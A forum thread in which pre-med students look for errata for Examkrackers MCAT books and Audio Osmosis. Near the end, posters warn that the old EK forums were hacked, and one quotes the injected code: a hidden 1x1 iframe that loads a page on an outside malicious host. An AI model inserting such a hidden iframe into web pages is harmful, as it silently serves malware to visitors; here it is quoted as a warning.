Audio Osmosis and EK errata list

This forum made possible through the generous support of SDN members, donors, and sponsors. Thank you.

frikarika

RADIOHEAD
10+ Year Member
5+ Year Member
15+ Year Member
Reaction score
Before someone flames me for being stupid, I have tried to search for the past hour. I've searched the EK website for the "errata forum" to no avail, and I've searched SDN for a useful link but found nothing. So does anyone have a copy of the errata list for AO and the EK (6th ED)??

Members don't see this ad.

Before someone flames me for being stupid, I have tried to search for the past hour. I've searched the EK website for the "errata forum" to no avail, and I've searched SDN for a useful link but found nothing. So does anyone have a copy of the errata list for AO and the EK (6th ED)??

Keep looking, AO's there on the EK forums somewhere.

Members don't see this ad :)
have you guys tried to register for the forums at the EK website? i did that and then the errata forum became available for me to see. otherwise, i think it is hidden. hope that helps.

Do you have a link perhaps? I've feel like I've scoured that bastard pretty well. :confused:

LINK TAKEN DOWN, THE OLD EK FORUMS WERE HACKED AND ARE DISTRIBUTING VIRUSES AS OF 5/24/07 (see my post #15 on this thread)

I googled:

examkrackers "audio osmosis" errata

I can't find the errata for the EK books (whatever the last edition was/6th?). It used to be on their website (I've seen it in the past), but since they changed the format of the site earlier this month, it's GONE. I even posted a message two weeks ago asking where the book errata went, and no one has responded. If anyone finds that info, please let me know. Thanks.

I can't find the errata for the EK books (whatever the last edition was/6th?). It used to be on their website (I've seen it in the past), but since they changed the format of the site earlier this month, it's GONE. I even posted a message two weeks ago asking where the book errata went, and no one has responded. If anyone finds that info, please let me know. Thanks.

Like I said, you need to register in their new forums. Once you do this and activate your account, you'll still have to log in but once you do, you'll see the errata forums. Otherwise, if you are trying to view the forums while not logged in, you'll only be able to see the "Public" forum. The errata forum is a different forum, so log in and you'll see it.

Why do you think that?

Because I tried to open it on two different computers and both times my virus scan immediately picked up a trojan pointing to that link. I ended up having to do complete virus scan three times because it had an auto-reloader embedded in it. (I'm trying to reiterate what my husband told me because he works in computers and had to fix this for me - so sorry if I get any of the verbage incorrect). It wasn't a huge deal, I just wanted to put a warning for people that may not have a good virus scanner/firewall. I'm not even sure what the trojan does, because I got rid of it right away, but I wouldn't really want to find out either.

Because I tried to open it on two different computers and both times my virus scan immediately picked up a trojan pointing to that link. I ended up having to do complete virus scan three times because it had an auto-reloader embedded in it. (I'm trying to reiterate what my husband told me because he works in computers and had to fix this for me - so sorry if I get any of the verbage incorrect). It wasn't a huge deal, I just wanted to put a warning for people that may not have a good virus scanner/firewall. I'm not even sure what the trojan does, because I got rid of it right away, but I wouldn't really want to find out either.

You're right. The EK forums must have been hacked, which explains the recent redesign. Unfortunately, I doubt they have much administration experience, because keeping the old, hacked forums up in their present state is remarkably irresponsible.

I took a look at the source, which contains this at the very top (albeit lightly obfuscated):
<iframe src="http://allddos.biz/1/go.php" width=1 height=1 style="display:none"></iframe>

So browsing my link will make your browser secretly load that allddos.biz page, which no doubt contains your Internet Explorer specific trojan.